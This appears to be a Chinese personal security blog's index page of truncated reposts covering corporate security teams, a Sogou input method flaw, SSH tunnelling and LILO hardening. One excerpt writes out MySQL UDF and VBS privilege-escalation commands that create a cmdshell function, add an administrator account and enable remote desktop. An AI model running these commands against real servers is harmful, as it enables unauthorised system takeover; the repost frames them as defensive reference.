飘零的代码 piao2010 ’s blog

原文http://hi.baidu.com/zyqq/blog/item/d698b31c5b42458087d6b6f8.html
转载开始：
今天在Google Reader里看到一个链接，说benjurry发表了些看法。
我是ben总的忠实粉丝，ben总是中国互联网企业的CSO第一人（严格起来应该算是CISO），他的成长轨迹应该是甲方安全从业人员最希望可以探索和参考的。
首先转载一下ben总的原文：
——————————–分割线———————–转载开始————————————————
我来简单介绍下各互联网公司的安全团队吧，不当的地方还望各位补充和指正。
1、为什么互联网公司要有自己的安全团队。
a，公司重视：互联网公司的业务特别依赖于网络，网络的稳定和安全直接关系的公司业务，甚至是公司的市值，因此需要重点保障；
b，市场不能完全满足：由于安全公司偏向于传统网络安全，比较关注漏洞、FW、IDS、Scanner、Anti-DDOS、UTM等通用性安全产品和技 术的研究，对于互联网公司的业务分析的相对少一些，因此短期内无法满足互联网公司的全部需求，因此在需要得到安全公司的服务外，还有不少安全需求无法解 决。

今天在大风的博客上看见题为《我们在做什么？将走向何方？》的文章，原文地址
http://hi.baidu.com/aullik5/blog/item/a2fbb110c6950e75ca80c4f8.html
觉得可以了解到企业内部安全部门的发展趋势，所以转载过来。

“我们在做什么？将走向何方？”
这本来是一个极具有哲学意味的命题，在读大学的时候，我的心理课程老师就专门给我们上过一堂这样的课。但今天在这里，我并不想探讨任何哲学或者人生的问题，只是想讲讲我对甲方安全发展方向的一些理解。对面临就业选择的朋友来说，可以作为一个参考。

转载：
无意发现了一个很严重的漏洞，和当年3389 输入法漏洞相似。 不过暂时不影响未系统未加载搜狗输入法（未登录系统）。如果远程服务器装了 搜狗，登录系统后加载了搜狗，而又未及时注销或kill掉搜狗输入法直接关闭了远程连接，那么这些server 就很危险咯。
测试环境：
OS: windows 7 ultimate
搜狗输入法 4.3 正式版
漏洞过程描述：

本文是转载，仅供系统管理人员安全防护参考之用！
一 UDF提权
这类提权方法我想大家已经知道了，我大致写一下，具体语句如下：
create function cmdshell returns string soname ’udf.dll’
select cmdshell(’net user iis_user 123!@#abcABC /add’);
select cmdshell(’net localgroup administrators iis_user /add’);
select cmdshell(’regedit /s d:\web\3389.reg’);
drop function cmdshell;
select cmdshell(’netstat -an’);
二 VBS启动项提权
create table a (cmd text);
insert into a values (”set wshshell=createobject (””wscript.shell””) ” );
insert into a values (”a=wshshell.run (””cmd.exe /c net user iis_user [...]

应该是很古老的技术了，拿来凑数更新一下博客吧。至于SSH Tunnel代理有什么用途就留给读者思考吧。利用putty的ssh tunnel功能实现安全的代理，原理是当用putty ssh连接到远程服务器的时候，putty可以在本地开启一个端口，本地的应用程序连接到本地的这个端口。相当于putty在本地充当了一个socks代理服务器为本地的应用程序提供socks代理。

1.为LILO增加开机口令 
　　在/etc/lilo.conf文件中增加选项，从而使LILO启动时要求输入口令，以加强系统的安全性。具体设置如下: 
　　boot=/dev/hda 
　　map=/boot/map 
　　install=/boot/boot.b 
　　time-out=60 #等待1分钟 
　　prompt 
　　default=Linux 
　　password= 
　　#口令设置 
　　image=/boot/vmlinuz-2.2.14-12 
　　label=Linux